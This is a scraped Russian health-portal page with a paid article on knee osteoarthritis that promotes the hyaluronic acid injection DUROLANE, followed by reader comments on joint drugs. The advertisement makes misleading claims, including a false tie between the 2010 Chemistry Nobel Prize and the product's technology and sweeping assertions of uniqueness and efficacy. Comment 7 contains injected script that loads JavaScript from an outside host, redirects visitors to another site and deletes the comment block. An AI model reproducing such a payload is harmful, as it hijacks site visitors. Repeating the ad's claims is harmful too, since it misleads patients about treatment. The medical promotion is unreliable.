Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Гонартроз: остеоартроз ко...  >>  Гонартроз: остеоартроз коленного сустава
 
Обратная связь
 

Гонартроз: остеоартроз коленного сустава

Размер шрифта
02 мая 2012 10:00
  • google_analytics: false
  • Нравится

Остеоартроз коленного сустава – серьезное заболевание. Как оно возникает, и как его лечить?

Остеоартроз — самое частое заболевание суставов, которым страдают не менее 20% населения земного шара. Чаще всего остеоартроз поражает крупные суставы человека, например коленные. В таком случае остеоартроз называется гонартрозом.

Строение коленного сустава

Колено – это сустав, соединяющий бедренную кость с голенью, а именно с большеберцовой костью. Таким образом, коленный сустав образован поверхностями нескольких костей и поддерживается несколькими группами связок.

Этот сустав заключен в герметичную суставную капсулу (синовиальную), заполненную особой жидкостью, которая также называется синовиальной. Эта жидкость необходима для плавного скольжения суставных костей во время различных движений.

Важным компонентом коленного сустава являются хрящи, покрывающие суставные поверхности костей. Каждый хрящ на 98% состоит из хрящевой основы (матрикса).

Основными компонентами матрикса являются коллаген, образующий прочный волокнистый каркас, и протеогликаны, делающие хрящ упругим и эластичным. Также в составе хряща имеются особые клетки – хондробласты и хондроциты, синтезирующие компоненты матрикса.

Причины развития гонартроза

К факторам риска развития гонартроза относятся:

  • пожилой возраст;
  • женский пол;
  • высокая физическая активность;
  • ожирение, которое является независимым фактором риска развития гонартроза;
  • высокая минеральная плотность костной ткани;
  • травмы в анамнезе;
  • применение гормональной заместительной терапии;
  • низкое потребление витаминов С и D;
  • курение.

Как возникает гонартроз

Под воздействием перечисленных факторов риска, неблагоприятных биологических и механических причин, разрушающих хрящи коленного сустава, развивается гонартроз. Суставный хрящ теряет упругость, в нем появляются микротрещины, суставные поверхности костей обнажаются, возникает трение поверхностей костей.

Также воспаляется синовиальная оболочка коленного сустава, из-за чего изменяется состав и снижается вязкость синовиальной жидкости. Суставная капсула утолщается. На поверхности костей коленного сустава появляются кисты и разрастаются костные шипы, так называемые остеофиты, которые мешают свободным движениям сустава.

При движениях возникает характерный симптом гонартроза — крепитация (хруст, треск или скрип).

Все эти изменения приводят к тому, что в коленном суставе появляется ведущий признак гонартроза – боль.

Как лечить гонартроз

Прежде всего необходимо восстановить структуру суставного хряща. Для чего требуется поддерживать необходимый уровень и качество гиалуроновой кислоты в организме. Для этой цели были разработаны препараты гиалуроновой кислоты для внутрисуставного введения – «заменители» внутрисуставной жидкости. Именно они облегчают жизнь больных и позволяют отсрочить эндопротезирование.

В настоящее время рынок таких препаратов переполнен – около 100 торговых наименований. Для результата необходим курс от 3 до 5 внутрисуставных инъекций. Курс может продолжаться от 3 до 5 недель. Это отягчает жизнь и повышает возможность инфекции. Кроме того, не каждый производитель может гарантировать эффективность и безопасность препаратов.

ДЬЮРАЛАН – гиалуроновая кислота, созданная с применением высоких технологий и передовой научной мысли, единственный в мире препарат, производимый по запатентованной биотехнологии NASHA. Данная биотехнология позволяет сократить сроки лечения и избежать побочных реакций. За разработку особого органического синтеза, используемого создателями препарата, авторы (Richard F. Heck, Ei-ichi Negishi, Akira Suzuki) были удостоены в 2010 году Нобелевской премии в области химии.

На сегодняшний день этот препарат успешно применяется в странах Европы и США. ДЬЮРАЛАН – единственный из препаратов гиалуроновой кислоты, включенный в список обязательных лекарственных средств для лечения остеоартроза, в Великобритании.

Препарат зарегистрирован и сертифицирован на территории Российской Федерации, соответствует стандартам безопасности Евросоюза, одобрен к применению американским Управлением по контролю за лекарственными средствами.

Лекарство выпускается в готовых шприцах по 3 мл (для крупных суставов) и по 1 мл (для мелких суставов).

Всего одна внутрисуставная инъекция препарата значительно уменьшает боль и возвращает утраченную подвижность сустава на 6-12 месяцев.

Высокая эффективность и длительность действия ДЬЮРАЛАНА, его безопасность позволяют считать его препаратом выбора в комплексном лечении остеоартроза.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

30 апреля 2013 в 19:48

Цитировать   |   Пожаловаться

Алфлутоп тоже содержит гиалуроновую кислоту, а вот толку от него никакого, по крайней мере мне он не помог.

2 - Гость

21 мая 2013 в 08:23

Цитировать   |   Пожаловаться

Ничего удивительного, я вообще не понимаю, как может помочь препарат в составе которого содержится фенол. Насколько я понимаю это довольно токсичное вещество, а его в лекарство добавляют.

3 - Гость

10 июня 2013 в 22:43

Цитировать   |   Пожаловаться

И правда, препарат содержит фенол, как его вообще назначают непонятно. Помог данный препарат единицам, вызывает аллергии и прочие побочные эффекты. Выход один - лечится народными средствами.

4 - Гость

07 июля 2013 в 16:27

Цитировать   |   Пожаловаться

Мне помогли уколы, хотя не верилось после полугодового лечения таблетками из группы хондропротекторов. Не усваивались они что ли, не знаю. 

5 - Гость

05 августа 2013 в 12:53

Цитировать   |   Пожаловаться

Я лечилась  (хондропротектор, в виде уколов) - помогло, правда только после второго курса инъекций. Все хондропротекторы вообще действуют медленно. Зато верно )))

6 - Гость

20 апреля 2014 в 18:19

Цитировать   |   Пожаловаться

Фенола в Алфлутопе меньше в 10 раз чем в питьевой воде)))
Посмотрите нормативы РФ...  Мне Алфлутоп отлично помогает, да и родне тоже...

7 - zzzzzz

30 июня 2015 в 23:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

8 - Гость

01 октября 2016 в 17:24

Цитировать   |   Пожаловаться

Могут ли хондропротекторы остановить болезнь? Назначили уколы эльбоны, боль прошла, но теперь мучает вопрос: надолго ли она поможет? Будут ли еще обострения? Слышала, что гонартроз - на всю жизнь. К чему готовиться? Врачей беполезно спрашивать, только рукой машут. 

9 - Гость

02 октября 2016 в 11:34

Цитировать   |   Пожаловаться

На Эльбоне обострения редко возникают. По крайней мере. после того как я ее стала раз в плгода по месяцу прокалывать, сильные боли уже не беспокоят. Но помимо лекарств нужна еще и физкультура, и физио. 

10 - Гость

29 октября 2016 в 23:42

Цитировать   |   Пожаловаться

type="text/css">Эльбона сильный препарат, жалко, что дорого стоит. На полный курс у меня ушло около двух тысяч. Утешает только, что курс надо повторять раз в полгода, не чаще. 

Статьи

       
Лучшие лекарства от боли в суставах   История пациента. Максим, горнолыжник   История пациента. Александр, вело-спортсмен   История пациента. Владимир, менеджер банка  
07 мая 2013Удобно готовить на антипригарных покрытиях? Наверное, но скоро вам придется менять сустав! 19 декабря 2012Газированные напитки увеличивают риск артрита
 
18 января 2012Артрит заставляет клетки стареть быстрее 14 июля 2011Тефлоновое покрытие приводит к артриту
 

Слайдшоу

Вся правда о ревматоидном артрите Вся правда об остеоартрозе
Когда колени надо менять 7 ранних признаков артрита
Как сохранить здоровье суставов    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.